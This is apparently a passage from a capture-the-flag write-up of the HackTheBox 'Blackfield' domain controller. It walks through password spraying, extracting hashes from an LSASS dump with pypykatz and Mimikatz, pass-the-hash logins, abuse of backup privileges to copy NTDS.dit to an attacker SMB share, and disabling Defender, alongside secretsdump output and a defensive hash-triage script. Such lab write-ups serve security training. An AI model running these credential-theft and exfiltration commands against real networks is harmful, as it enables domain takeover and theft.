13M -rwxr-xr-x 1 root root 13M May 28 2020 RuntimeBroker.zip
126M -rwxr-xr-x 1 root root 126M May 28 2020 ServerManager.zip
18M -rwxr-xr-x 1 root root 18M May 28 2020 WmiPrvSE.zip
37M -rwxr-xr-x 1 root root 37M May 28 2020 conhost.zip
24M -rwxr-xr-x 1 root root 24M May 28 2020 ctfmon.zip
23M -rwxr-xr-x 1 root root 23M May 28 2020 dfsrs.zip
18M -rwxr-xr-x 1 root root 18M May 28 2020 dllhost.zip
8.5M -rwxr-xr-x 1 root root 8.5M May 28 2020 ismserv.zip
40M -rwxr-xr-x 1 root root 40M May 28 2020 lsass.zip
62M -rwxr-xr-x 1 root root 62M May 28 2020 mmc.zip
32M -rwxr-xr-x 1 root root 32M May 28 2020 sihost.zip
33M -rwxr-xr-x 1 root root 33M May 28 2020 smartscreen.zip
14M -rwxr-xr-x 1 root root 14M May 28 2020 svchost.zip
34M -rwxr-xr-x 1 root root 34M May 28 2020 taskhostw.zip
14M -rwxr-xr-x 1 root root 14M May 28 2020 winlogon.zip
3.9M -rwxr-xr-x 1 root root 3.9M May 28 2020 wlms.zip
Rabbit hole (Unpwn3dCompany)
The commands_output folder reveals a user named Ipwn3dYourCompany in the Domain Admins group:
jamarir@kali:~$ cat commands_output/domain_admins.txt
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.
Trying a password spray using this username as the password doesn’t reveal valid credentials on the existing domain accounts :/
jamarir@kali:~$ cat valid_users.txt
Administrator
Guest
DC01$
support
svc_backup
jamarir@kali:~$ nxc smb 10.10.10.192 -u valid_users.txt -p 'Ipwn3dYourCompany' -d BLACKFIELD.local
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Administrator:Ipwn3dYourCompany STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Guest:Ipwn3dYourCompany STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\DC01$:Ipwn3dYourCompany STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\support:Ipwn3dYourCompany STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\svc_backup:Ipwn3dYourCompany STATUS_LOGON_FAILURE
LSA OverViewed
However, there's an interesting lsass.zip archive, which contains an LSASS dump:
jamarir@kali:~$ unzip -l lsass.zip
Archive: lsass.zip
Length Date Time Name
--------- ---------- ----- ----
143044222 2020-02-23 11:02 lsass.DMP
--------- -------
143044222 1 file
Windows authentication
You may check Microsoft's documentation on Windows Authentication Concepts, Security Principals, Credentials Processes in Windows Authentication, LSA Protection Configuration and Cached and Stored Credentials Technical Overview, this Synacktiv article, or this hackndo article, among many other resources, for more details.
An Account, also named a Security Principal, is any local or domain entity able to authenticate to an OS, identified by a unique SID (Security IDentifier). When an account (user, computer, service) authenticates in Windows, its credentials are validated by the LSA (Local Security Authority) against:
- The computer's SAM database (in the registry) for local authentications. Here, the LSA verifies the credentials itself.
- The DC's AD database (in NTDS.dit) for domain authentications. Here, the LSA forwards the credentials to the account's issuer for verification.
The LSA is responsible for determining whether the authentication is local or domain-based, as well as for maintaining the computer's local security policy.
When a successful authentication occurs, the sign-in process returns the account's SIDs (identity and groups). These SIDs are used by the LSA to create the account's (primary) access token. Any thread running on the account's behalf has this token attached.
Therefore, whenever the process performs an action, the OS can check its permissions by looking at its attached access token.
When a successful local authentication occurs, the sign-in process locally caches, in memory, the account's credentials in the LSA. This LSA cache provides SSO (Single Sign-On) to the account, freeing it from re-entering its credentials for each remote service (e.g. SMB, Exchange Server, SharePoint, …).
Indeed, with an LSA cache on a computer, the authentication process becomes local. Therefore, if the user updates his cloud password, he may still access the computer locally with his old password if the LSA cache isn't cloud-synchronized yet. In particular, computers that are disconnected from the DC authenticate users based on the cached LSA credentials.
LSA or LSASS ?!
The LSA contains 2 services:
- The LSA Subsystem Service (LSASS), which caches the active users' session credentials in memory on the computer.
- The LSA Server Service (LSASS), which keeps track of the account and security policies on the computer.
We are mostly interested in the service caching credentials. Cached credentials:
- Are those of unclosed sessions since the last restart.
- Are created in any of the following circumstances on the computer:
  - Logging in to RDP (locally or remotely).
  - Running a task using RunAs or a remote administration tool.
  - Running a service, a scheduled task, or a batch job.
- Can be in any of the following forms:
  - Reversibly encrypted plaintext.
  - TGT or TGS.
  - NTHash, or LMHash if enabled.
A traveler analogy…
To use the travel analogy, when the traveler arrives at the international border, his identity is checked by the LSA guard for journeys in the same local continent. However, if you go to another continent using an airplane, the LSA guard forwards your request to the corresponding Airplane Controller guard that holds a legitimate copy of your ID.
When authenticated, you’re assigned a citizen ticket which will identify you for every action you’ll make. For example, if you want to access a sport event, you can use that citizen ticket to prove your identity.
Finally, if you want to travel in the local continent, you don’t need to authenticate your ID again. Indeed, the LSA guard already knows you.
Image taken from Microsoft.
Logonpasswords them all !
Dumping processes can be used for debugging purposes, such as diagnosing a program crash. We can dump processes we have rights on, such as the ones we created ourselves, using:
- The Task Manager:
- The ProcDump tool, from the Sysinternals suite:
PS C:\Users\jamarir> procdump64.exe -ma Explorer Notepad.dmp
ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[<DATE>] Dump 1 initiated: C:\Users\jamarir\Downloads\Notepad.dmp
[<DATE>] Dump 1 writing: Estimated dump file size is 451 MB.
[<DATE>] Dump 1 complete: 451 MB written in 9.5 seconds
[<DATE>] Dump count reached.
Because the logged-on sessions' credentials are locally cached by LSASS, we can parse such dumps and extract secrets using:
- The pypykatz tool:
jamarir@kali:~$ pypykatz lsa minidump lsass.DMP |grep -vP '^[\S]+\s*|\s+?.*? ?(None|\(hex\)|:\s*)$'
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
[...]
== MSV ==
Username: DC01$
Domain: BLACKFIELD
LM: NA
NT: b624dc83a27cc29da11d9bf25efea796
SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
DPAPI: 0000000000000000000000000000000000000000
== WDIGEST [5950b]==
username DC01$
domainname BLACKFIELD
== Kerberos ==
Username: DC01$
Domain: BLACKFIELD.local
Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
[...]
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a8955000000000
[...]
== DPAPI [25869]==
luid 153705
key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
[...]
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
[...]
== DPAPI [633e3]==
luid 406499
key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991
[...]
- The Mimikatz minidump feature:
PS C:\Users\jamarir> mimikatz.exe "sekurlsa::minidump lsass.DMP" "sekurlsa::logonpasswords" "exit" |Select-String -NotMatch '^.*\(null\)|^\s*\w+\s+:\s*$'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'
mimikatz(commandline) # sekurlsa::logonpasswords
Opening : 'lsass.DMP' file for minidump...
Authentication Id : 0 ; 406458 (00000000:000633ba)
Session : Interactive from 2
User Name : svc_backup
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23/02/2020 19:00:03
SID : S-1-5-21-4194615774-2175524697-3563712290-1413
[00000003] Primary
* Username : svc_backup
* Domain : BLACKFIELD
* NTLM : 9658d1d1dcd9250115e2205d9f48400d
* SHA1 : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
* DPAPI : a03cd8e9d30171f3cfe8caad92fef621
* Username : svc_backup
* Domain : BLACKFIELD
* Username : svc_backup
* Domain : BLACKFIELD.LOCAL
Authentication Id : 0 ; 365835 (00000000:0005950b)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Time : 23/02/2020 18:59:38
SID : S-1-5-96-0-2
[00000003] Primary
* Username : DC01$
* Domain : BLACKFIELD
* NTLM : b624dc83a27cc29da11d9bf25efea796
* SHA1 : 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
* Username : DC01$
* Domain : BLACKFIELD
* Username : DC01$
* Domain : BLACKFIELD.local
* Password : &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
[...]
Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23/02/2020 18:59:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
* Username : Administrator
* Domain : BLACKFIELD
* Username : Administrator
* Domain : BLACKFIELD.LOCAL
[...]
mimikatz(commandline) # exit
Bye!
For some reason, I couldn't read the logon credentials of a process I launched in my VM, which returned ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations:
PS C:\Users\jamarir> mimikatz.exe "sekurlsa::minidump $env:Temp\Notepad.DMP" "sekurlsa::logonpasswords" "exit" |Select-String -NotMatch '^(Logon Time)|^.*\(null\)|^\s*\w+\s+:\s*$'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # sekurlsa::minidump C:\Users\jamarir\AppData\Local\Temp\Notepad.DMP
Switch to MINIDUMP : 'C:\Users\jamarir\AppData\Local\Temp\Notepad.DMP'
mimikatz(commandline) # sekurlsa::logonpasswords
Opening : 'C:\Users\jamarir\AppData\Local\Temp\Notepad.DMP' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations
mimikatz(commandline) # exit
Bye!
In particular, we see that svc_backup's NTHash is 9658d1d1dcd9250115e2205d9f48400d. Being a member of the Remote Management Users domain group, we may Pass-The-Hash over WinRM to impersonate svc_backup, and get the user flag!
jamarir@kali:~$ evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type c:\users\svc_backup\desktop\user.txt
39[...]43
svc_backup, operate NTDS.dit plz !
Registry OverViewed
You may check Wikipedia, Microsoft's documentation on Registry hives, or the Windows 2000 Registry Reference, for more details.
As the Microsoft documentation states, hives are key:value files stored in the registry, loaded into memory at boot or user logon. These hives locally configure Windows (environment variables, desktop/application preferences, network settings, etc.) at a:
- User level (user profile hive, HKEY_CURRENT_USER). The currently logged-on user's configuration is stored in the %USERPROFILE%\Ntuser.dat file.
- Computer level (machine profile hive, HKEY_LOCAL_MACHINE). It mostly contains 4 hives (also called keys, or subkeys) in %SYSTEMROOT%\System32\Config:
  - HKLM\SAM: Stores the local SAM database, containing the local accounts' information. In particular, it contains the non-builtin accounts' NTHashes.
  - HKLM\SECURITY: Stores a dynamic link to the SAM database of the domain on which the user logged on, as well as the security policies to be enforced by the kernel.
  - HKLM\SYSTEM: Stores the Windows system setup, such as RNG data, mounted filesystems, and the Control Sets configuring hardware drivers / services.
  - HKLM\SOFTWARE: Stores program variables applying to all users.
Each hive can be parsed using the Registry Explorer, made by Eric Zimmerman (manual). Here are some samples from my VM:
What's interesting to note is that both the NTDS and the local SAM databases are encrypted with the Boot Key, which lives in the SYSTEM registry hive. So, with each file pair (NTDS.dit + SYSTEM, or SAM + SYSTEM), we can extract domain or local credentials respectively.
Secretsdumping Backed-up Dumps
svc_backup has the SeBackup privilege:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
As shown in BloodHound, this privilege is given to users in the Backup Operators group, a High Value target group:
Members of the Backup Operators group have SeBackupPrivilege, allowing them to backup any file, bypassing its permissions.
Thus, because we're on a DC, we can backup the NTDS.dit database and its SYSTEM key. For local authentications on the DC, we'll instead backup the SAM and SYSTEM hives.
These backups MUST be shadow-copied when the file is in use (as NTDS.dit always is on a running DC), since we can't copy currently-in-use files.
The methodologies are the following:
reg.exe secrets extraction (SAM + SYSTEM)
- Backup the SAM and SYSTEM hives (e.g. in C:\Windows\Tasks\):
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\sam C:\windows\tasks\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system C:\windows\tasks\system.hive
The operation completed successfully.
- Copy the interesting files to the attacker's machine (10.10.14.20 here), and clean up the backups:
jamarir@kali:~$ smbserver.py share . -smb2support
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cp c:\windows\tasks\*.hive \\10.10.14.20\share\
*Evil-WinRM* PS C:\Users\svc_backup\Documents> rm c:\windows\tasks\*.hive
- Extract NTHashes using secretsdump.py or pypykatz:
jamarir@kali:~$ secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
jamarir@kali:~$ pypykatz registry --sam sam.hive system.hive
[...]
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 73d83e56de8961ca9f243e1a49638393
============== SAM hive secrets ==============
HBoot Key: 1d645695662cc2a70d54ee626104485110101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Alternatively, offline dumping with Mimikatz is possible (requires admin to turn Defender off):
*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-MpPreference -DisableRealtimeMonitoring $true
*Evil-WinRM* PS C:\Users\svc_backup\Documents> ./mimikatz.exe "lsadump::sam /sam:C:\windows\tasks\sam.hive /system:C:\windows\tasks\system.hive" exit
[...]
SAMKey : 1d645695662cc2a70d54ee6261044851
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 67ef902eae0d740df6257f273de75051
[...]
diskshadow.exe secrets extraction (NTDS + SYSTEM)
- Shadow-copy the C: drive and expose it as any free drive letter (e.g. X:), working from e.g. C:\Windows\Tasks\:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd c:/windows/tasks/
*Evil-WinRM* PS C:\windows\tasks> $alias="foo"; "set context persistent nowriters`r`nadd volume c: alias $alias`r`ncreate`r`nexpose %$alias% x:" |Out-File -Encoding ascii -nonewline "$alias.dsh"
*Evil-WinRM* PS C:\windows\tasks> diskshadow.exe /s "$alias.dsh"
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, <DATE>
-> set context persistent nowriters
-> add volume c: alias foo
-> create
Alias foo for shadow ID {d933451e-36a6-4c58-8340-e80aeae781de} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {9b8032f4-cc5c-47d3-894b-c383e53f79a1} set as environment variable.
Querying all shadow copies with the shadow copy set ID {9b8032f4-cc5c-47d3-894b-c383e53f79a1}
* Shadow copy ID = {d933451e-36a6-4c58-8340-e80aeae781de} %foo%
- Shadow copy set: {9b8032f4-cc5c-47d3-894b-c383e53f79a1} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: <DATE>
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %foo% x:
-> %foo% = {d933451e-36a6-4c58-8340-e80aeae781de}
The shadow copy was successfully exposed as x:\.
- Copy the NTDS and SYSTEM files from our X: drive:
*Evil-WinRM* PS C:\windows\tasks> robocopy /b x:\windows\ntds . ntds.dit
*Evil-WinRM* PS C:\windows\tasks> robocopy /b x:\windows\system32\config . system
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : <DATE>
Source : x:\windows\system32\config\
Dest : C:\windows\tasks\
Files : system
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 x:\windows\system32\config\
New File 17.0 m SYSTEM
0.0%
0.3%
[...]
- Copy the interesting files to the attacker's machine (10.10.14.20 here), and clean up the shadow volume:
jamarir@kali:~$ smbserver.py share . -smb2support
*Evil-WinRM* PS C:\windows\tasks> Copy-Item ntds.dit,SYSTEM -Destination \\10.10.14.20\share\
*Evil-WinRM* PS C:\windows\tasks> "delete shadows volume trophy`r`nreset" |Out-File -Encoding ascii -nonewline clean.dsh
*Evil-WinRM* PS C:\windows\tasks> diskshadow.exe /s clean.dsh
- Extract NTHashes using secretsdump.py (add the -history option to also get the users' old password hashes):
jamarir@kali:~$ secretsdump.py -ntds ntds.dit -system SYSTEM local -history
Impacket v0.13.0.dev0+20241024.90011.835e175 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:7f1e4ff8c6a8e6b6fcae2d9c0572cd62:::
Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:ac2983b6afa7bdea9360fa7a95e31855:::
Administrator_history2:500:aad3b435b51404eeaad3b435b51404ee:a47feb765cf90d3216423e9cfedea565:::
Administrator_history3:500:aad3b435b51404eeaad3b435b51404ee:24958cffdd2aa3125c63c3fd374db44b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:5964cac13966b5f0ae5a519fc4646b0f:::
DC01$_history0:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
[...]
DC01$_history18:1000:aad3b435b51404eeaad3b435b51404ee:61aa6c112ae61a801f41d0751b50f681:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
krbtgt_history0:502:aad3b435b51404eeaad3b435b51404ee:ac4e588741c6d7d6505dab2ab46e1ca8:::
[...]
krbtgt_history8:502:aad3b435b51404eeaad3b435b51404ee:b5ca59b606a13445af2043409d2c0086:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
audit2020_history0:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
audit2020_history1:1103:aad3b435b51404eeaad3b435b51404ee:c63407eac237a49a7e559f453cc6a4df:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
support_history0:1104:aad3b435b51404eeaad3b435b51404ee:eca3e06b52f76be986e4cd4a01c0db69:::
support_history1:1104:aad3b435b51404eeaad3b435b51404ee:7375cef738882d6c3a4592217951f491:::
[...]
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
svc_backup_history0:1413:aad3b435b51404eeaad3b435b51404ee:c9dbdd98a153902cdb7a8b7c75f5d32e:::
svc_backup_history1:1413:aad3b435b51404eeaad3b435b51404ee:cebb051cfe9bb3e92a6c92a1f63d4559:::
svc_backup_history2:1413:aad3b435b51404eeaad3b435b51404ee:9d361a334c9fc1baa97b04a33ccad73c:::
[...]
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:dbd84e6cf174af55675b4927ef9127a12aade143018c78fbbe568d394188f21f
Administrator:aes128-cts-hmac-sha1-96:8148b9b39b270c22aaa74476c63ef223
Administrator:des-cbc-md5:5d25a84ac8c229c1
DC01$:aes256-cts-hmac-sha1-96:05fa169ef2fa63ce8fca5ad9b47602ce0ea5bcb2ad284e4b5b39510bf18d34c0
DC01$:aes128-cts-hmac-sha1-96:52a5c3142f1d92543f5e42cee189d721
DC01$:des-cbc-md5:0186100179b99143
krbtgt:aes256-cts-hmac-sha1-96:bd31681b175bd44ddf68c064445ca4e510ba2115e106905bdfef6ef0ff66b32c
krbtgt:aes128-cts-hmac-sha1-96:676f63c263b8d482b271d091b2dde762
krbtgt:des-cbc-md5:fb4cb5761aef465d
audit2020:aes256-cts-hmac-sha1-96:bdeca8eb67c5e70984efdfb33defdfc15644408fb06e948df7dba6d1760e0c0e
audit2020:aes128-cts-hmac-sha1-96:5d1e1cb1fc6b59436fe9c9454c1d1608
audit2020:des-cbc-md5:c40701e67a10b673
support:aes256-cts-hmac-sha1-96:74574c46cab866ba40841f83b1226d429f6338fdf574f9a232ef551f9b7550c9
support:aes128-cts-hmac-sha1-96:19331e579612b1eb3356e8b5f0e2d890
support:des-cbc-md5:dfae341cef208f52
[...]
svc_backup:aes256-cts-hmac-sha1-96:20a3e879a3a0ca4f51db1e63514a27ac18eef553d8f30c29805c398c97599e91
svc_backup:aes128-cts-hmac-sha1-96:139276fff0dcec3c349cb8b563691d06
svc_backup:des-cbc-md5:981a38735d7c32d6
[...]
SRV-INTRANET$:des-cbc-md5:4579ce9240895dae
[*] Cleaning up...
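A dump like the one above is only useful to a defender once it is triaged: which accounts have a blank password, which still store an LM hash, which accounts share a password, and which have cycled back to an old one. The following is an added example, not part of the original write-up: a small parser for the uid:rid:lmhash:nthash::: lines secretsdump.py prints (with the _historyN suffix that -history adds), plus the checks that can be made from the hashes alone, without cracking anything. The sample dump is constructed; the two constants are the well-known empty LM and empty-password NT values (the latter is the one Guest shows above).

```python
"""Triage of secretsdump-style hash dump lines (uid:rid:lmhash:nthash:::).

Added example: not part of the original write-up. The sample dump below is
constructed; the two constants are the well-known empty LM/NT hash values.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Matches both "user:rid:lm:nt:::" and "domain\user:rid:lm:nt:::", with the
# optional "_historyN" suffix that secretsdump -history adds to old hashes.
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+?)(?:_history(?P<hist>\d+))?"
    r":(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample: every hash is made up except the empty-password value.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_legacy:1105:0123456789abcdef0123456789abcdef:11112222333344445555666677778888:::
svc_shared1:1106:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
svc_cycle:1107:aad3b435b51404eeaad3b435b51404ee:aaaabbbbccccddddeeeeffff00001111:::
svc_cycle_history0:1107:aad3b435b51404eeaad3b435b51404ee:aaaabbbbccccddddeeeeffff00001111:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
"""


def parse_dump(text):
    """Return one dict per hash line; Kerberos-key and status lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        records.append({
            "domain": d["domain"],
            "user": d["user"],
            "rid": int(d["rid"]),
            "history_index": int(d["hist"]) if d["hist"] is not None else None,
            "lm": d["lm"].lower(),
            "nt": d["nt"].lower(),
        })
    return records


def triage(records):
    """Flag weak states visible from the hashes alone, without cracking anything."""
    findings = defaultdict(list)
    current = [r for r in records if r["history_index"] is None]

    for r in current:
        if r["nt"] == EMPTY_NT:                 # blank password
            findings["empty_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:                 # LM hash still stored (weak, crackable)
            findings["lm_hash_present"].append(r["user"])

    # The NT hash is unsalted, so the same hash on several accounts means the
    # same password.
    by_nt = defaultdict(list)
    for r in current:
        if r["nt"] != EMPTY_NT:
            by_nt[r["nt"]].append(r["user"])
    for users in by_nt.values():
        if len(users) > 1:
            findings["shared_password"].append(sorted(users))

    # Current hash equal to one of the account's own history entries: the
    # password was cycled back to an old value.
    history = defaultdict(set)
    for r in records:
        if r["history_index"] is not None:
            history[r["user"]].add(r["nt"])
    for r in current:
        if r["nt"] in history[r["user"]]:
            findings["password_reused_from_history"].append(r["user"])

    return dict(findings)


if __name__ == "__main__":
    for name, hits in triage(parse_dump(SAMPLE_DUMP)).items():
        print(f"{name}: {hits}")
```

Note that, as the output above shows, secretsdump's _history0 entry is the previous hash, not the current one (Administrator_history0 is 7f1e..., which Get-ADDBAccount lists as Hash 02), so a current hash matching any history entry really is a reuse.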
Pass-The-Hash th4t 4dm1n !
The Administrator's NTHash in NTDS is 184fb5e5178480be64824d4cd53b99ee.
GG WP !
jamarir@kali:~$ evil-winrm -i 10.10.10.192 -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'
*Evil-WinRM* PS C:\Users\Administrator\Documents> get-content ../desktop/root.txt
43[...]cb
Listing the members of Remote Management Users from BloodHound, or with the following LDAP query, doesn't show the Administrator account within that group:
